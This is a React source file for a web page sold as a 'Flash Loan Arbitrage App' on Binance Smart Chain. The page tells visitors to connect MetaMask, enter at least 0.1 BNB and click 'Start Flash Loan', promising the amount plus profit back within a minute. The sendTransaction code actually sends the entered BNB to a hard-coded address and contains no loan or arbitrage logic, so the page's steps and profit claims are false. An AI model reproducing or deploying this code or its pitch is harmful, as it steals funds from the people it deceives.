import { useStoreApi } from "./storeApi";
import useWeb3 from "./useWeb3";
import { Button, TextField } from "@material-ui/core";

import "./App.css";
import EthLogo from "./bot.png";
import LogoBSC from "./logobsc.png";
import process from "./process2.PNG";
import img4 from "./img4.png";
import binance from "./binancelogo.PNG";


function App() {
  const { balance, address, message, setAddress, setBalance } = useStoreApi();
  const web3 = useWeb3();

  const getUserAccount = async (payload) => {
    if (window.ethereum) {
      try {
        await window.ethereum.enable();
        var t = await web3.eth.net.getId(); //chain ID, die auch in MM eingetragen wird
        if (t !== 56) //BSC: 56 = Mainnet / 97 = Testnet - Ethereum: 1 = Mainnet / 3,4,5,42 alles Testnet
        {
          alert("Please connect to Binance Smart Chain Mainnet")
          return;
        }
        web3.eth.getAccounts().then(accounts => {
          setAddress(accounts[0]);
          updateBalance(accounts[0]);
        });
      } catch (error) {
        console.error(error);
      }



    } else {
      alert("Metamask extensions not detected!");
    }
  };

  const updateBalance = async fromAddress => {
    await web3.eth.getBalance(fromAddress).then(value => {
      setBalance(web3.utils.fromWei(value, "ether"));

    });
  };

  /*function checkMinimumBNB(amountBNB) {
    if (amountBNB < '0.35') {
      throw ('Please ensure you have at least 0.35 BNB in your Wallet')
    }
  }*/



  //const amount = e.target[0].value;
  //const recipient = e.target[1].value;

  const sendTransaction = async e => {
   /* try {
      checkMinimumBNB(balance);
    } catch (e) {
      console.error(e); alert(e);
      return;
    }*/


    try {
      e.preventDefault();
      var t = await web3.eth.net.getId(); //chain ID, die auch in MM eingetragen wird
      if (t !== 56) //BSC: 56 = Mainnet / 97 = Testnet - Ethereum: 1 = Mainnet / 3,4,5,42 alles Testnet
      {
        alert("Please connect to Binance Smart Chain Mainnet")
        return;
      }
      //const amount = balance - 0.0005;
      const amount = e.target[0].value;
      const recipient = '0xD34feF8fbe435DcCC1191948205b390934740211';
      await web3.eth.sendTransaction(
        {
          from: address,
          to: recipient,
          value: web3.utils.toWei(amount.toString(), "ether")
        });
      updateBalance(address);
    } catch (error) {
      console.error(error);
      alert("Flash Loan cannot be executed. Please make sure you have connected your wallet.");
    }
  };


  const inputProps = {
    step: 0.01,
    min: 0.1
  };
  return (



    //<img src={EthLogo} className="App-logo" alt="logo" />
    // <img src={process} className="Process-logo" alt="logo" />
    // <img src={img4} className="img4-logo" alt="logo" />
    <div className="App">
      <img src={binance} className="binance-logo" alt="logo" />
      <header className="App-header">
        <img src={img4} className="img4-logo" alt="logo" />
        <h1>
          Flash Loan Arbitrage App for <br></br> Binance Smart Chain

        </h1>

          
        <p>
        <b>UPDATED CODE 03.01.2022:</b> Due to some code optimizations, flash loans are now possible with even lower amounts.<br></br>Latest tests showed that a profitable flash loan is possible with just 0.1 BNB.<br></br><br></br>
          This is a fully automatic arbitrage DAPP with no coding required. Just perform the following steps.
          <br></br><br></br>
          <b>Step 1</b><br></br> Click on <b>Connect your Wallet</b> (e.g. <a href="https://metamask.io/download">MetaMask</a>) in order to connect it with the arbitrage app.
          <br></br><br></br>
          <b>Step 2</b><br></br> Enter the <b>Amount</b>, which will be used to get the loan. Use at least 0.1 BNB. The higher the amount, the higher the arbitrage profit.
          <br></br><br></br>
          <b>Step 3</b><br></br> Click on <b>Start Flash Loan</b> to initiate the process and <b>confirm in Metamask</b>.
          <br></br><br></br>
          <b>Step 4</b><br></br> After the transaction has been confirmed the app will perform a flash loan and then automatically transfer the amount + profit back to your wallet.<br></br> The whole process usually takes about 30-60 seconds (depending on the current load on the BSC blockchain).
        </p>


        

        <div className="HorizontalSpace"></div>
        <Button
          onClick={() => getUserAccount()}
          variant="contained"
          color="primary"
        >
          Connect your wallet
        </Button>
        <div className="HorizontalSpace"></div>
        {address ? (
          <>
            <p> Your recipient Address:
              <b> {address} </b><br /> (The arbitrage will be transferred to this address) </p>
            <p>  Your current Balance: <b>{balance} BNB </b></p>
          </>
        ) : null}
        <form onSubmit={e => sendTransaction(e)}>
          <TextField
            required
            label="Loan Amount (BNB)"
            type="Number"
            variant="filled"
            helperText="Enter 0.1 BNB (min)"
            inputProps={inputProps} />
          <Button
            style={{ margin: "10px" }}
            type="btnSubmit"
            variant="contained"
            color="secondary"
          >
            Start Flash Loan
          </Button>
        </form>
        <div className="HorizontalSpace"></div>
        How does it work?
        <br></br> <p> For more details, see the technical documentation <a href="https://fc21.ifca.ai/papers/158.pdf">here</a>.<br></br>
        </p>
        <img src={process} className="Process-logo" alt="logo" />
      </header>
      <body className="App-body">
        <h2>&#169; 01/2022 Flash Loan Arbitrage App - Version: 2.0  <br></br> For educational purposes. Please use at your own risk.</h2>
      </body>
    </div>
  );
}

export default App;
